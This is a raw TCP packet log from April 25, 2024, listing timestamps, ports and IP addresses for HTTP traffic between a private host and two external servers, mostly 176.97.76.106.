Apr 25, 2024 09:04:00.828551054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828620911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828797102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828865051 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828876972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828933954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828946114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.828969002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828989983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.828998089 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829039097 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829041004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.829083920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829097033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829137087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829169035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.829169035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:00.829175949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829201937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:00.829231024 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.065546989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065567017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065578938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065648079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065660000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065674067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.065751076 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.065752983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065800905 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065814972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065820932 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.065860987 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.065888882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065957069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.065994024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066006899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066035986 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066037893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066051006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066082954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066108942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066145897 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066171885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066217899 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066270113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066287994 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066333055 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066360950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066437006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066450119 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066477060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066514969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066514969 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066546917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066557884 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066616058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066625118 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066698074 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066711903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066742897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066760063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066761971 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066797018 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066807985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066844940 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066862106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066915989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066929102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066946983 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.066955090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066998005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.066998959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067059994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067133904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067146063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067179918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067181110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067204952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067208052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067219019 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067229033 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067260027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067264080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067301035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067310095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067353964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067361116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067387104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067445993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067457914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067524910 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067531109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067579031 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067590952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067614079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067622900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067653894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067663908 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067689896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067724943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067769051 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067789078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067800045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067830086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067850113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067862034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067909002 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067929029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067960978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.067970991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.067997932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068087101 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068103075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068126917 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068145037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068155050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068212986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068224907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068284035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068289042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068326950 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068346024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068356037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068392992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068394899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068479061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068492889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068515062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068550110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068568945 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068588018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068615913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068615913 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068645954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068658113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068670988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068700075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.068722963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.068867922 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.274275064 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 09:04:01.304306030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304331064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304405928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304405928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.304419041 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304470062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.304488897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304501057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304544926 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.304565907 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304609060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304620981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304653883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304656029 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.304693937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.304717064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304740906 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304779053 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.304903030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.304955959 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305012941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305032969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305043936 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305088997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305095911 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305107117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305171967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305171967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305182934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305239916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305242062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305308104 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305327892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305340052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305376053 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305376053 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305417061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305442095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305454016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305490017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305511951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305533886 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305583000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305583954 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305649042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305686951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305687904 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305752993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305764914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305798054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305803061 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305829048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305850029 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305872917 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305898905 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305932999 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305962086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.305979967 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.305996895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306035995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306036949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306101084 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306113005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306180954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306195021 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306226969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306231022 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306277037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306314945 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306325912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306332111 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306381941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306387901 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306512117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306530952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306541920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306559086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306572914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306592941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306622982 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306673050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306684971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306716919 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306735992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306757927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306777954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306842089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.306878090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306952953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.306965113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307012081 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307017088 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307058096 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307085037 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307101965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307162046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307207108 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307243109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307254076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307265043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307307005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307307005 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307337046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307358027 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307400942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307430983 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307457924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307468891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307516098 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307563066 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307620049 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307634115 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307672977 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307734013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307745934 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307794094 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307840109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307846069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307874918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307874918 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.307908058 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.307931900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308011055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308054924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308073997 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308090925 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308095932 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308115005 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308176994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308188915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308207035 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308259010 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308320045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308331966 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308373928 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308373928 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308398008 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308408976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308443069 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308478117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308478117 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308515072 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308557034 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308598995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308604956 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308629036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308692932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308696985 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308746099 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308758020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308795929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308800936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308831930 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308836937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308861017 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308908939 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.308929920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308981895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.308994055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309041023 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309068918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309081078 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309115887 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309118032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309159040 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309159040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309170961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309241056 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309248924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309281111 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309293032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309303045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309348106 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309353113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309353113 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309365988 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309423923 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309437037 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309448957 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309478045 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309488058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309550047 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309591055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309602976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309647083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309647083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309663057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309722900 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309766054 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309767962 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309778929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 09:04:01.309827089 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 09:04:01.309835911 CEST	80	49733	176.97.76.106	192.168.2.4
